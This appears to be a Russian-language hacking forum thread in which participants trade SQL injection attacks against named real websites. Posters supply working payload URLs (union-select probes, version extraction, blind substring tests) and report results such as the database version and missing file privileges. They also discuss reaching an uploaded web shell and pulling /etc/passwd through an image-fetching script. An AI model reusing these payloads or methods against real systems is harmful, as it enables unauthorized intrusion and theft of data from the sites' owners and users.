ОЧЕНЬ ДАЖЕ ЗРЯЧАЯ))) только вот limit с union не дружит (как мне помнится) и or/and не льзя использовать.

Хотелось бы и самому узнать что в таких случаях сделать можно

Не хочу тебя растраивать но не бывает в MySQL 4 ветки INFORMATION.SCEMATA а то что она тебе пишет Access denied совсем не означает что данная бд существует:
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+AkyHa_MaTaTa.My_HeRo/*
Во всем виноваты подлые гранты если бы не они нам бы прямо в лицо сказали - ни какой ты не HeRo.

2 AkyHa_MaTaTa.My_HeRo

спс - буду знать

2 +++AndreyDevil+++
Я так и не нашел где заливается - может плохо искал. Зато нашел SQL
http://siovizcenter.ucsd.edu/admin/selectedAnnounce.php?ID=35'/*
может пригодится

судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd

http://www.zork.name/?view=1%27

вроде как, файлы хранятся в базе, а не линки.
http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,111111111,null/*

прав на mysql.user нет
file_priv N

обычная скуля ,с не совсем обычным выводом.

http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,version(),null/*
4.1.22-log

Хоть 5555 ставь хоть 1111 хоть etc/passwd всё равно шелл качает )

слепая(могу ошибаться, но фантазии не хватает)
http://www.zork.name/?view=1)+and+substring(version(),1,1)=5--+

лимит с ордером не дружит.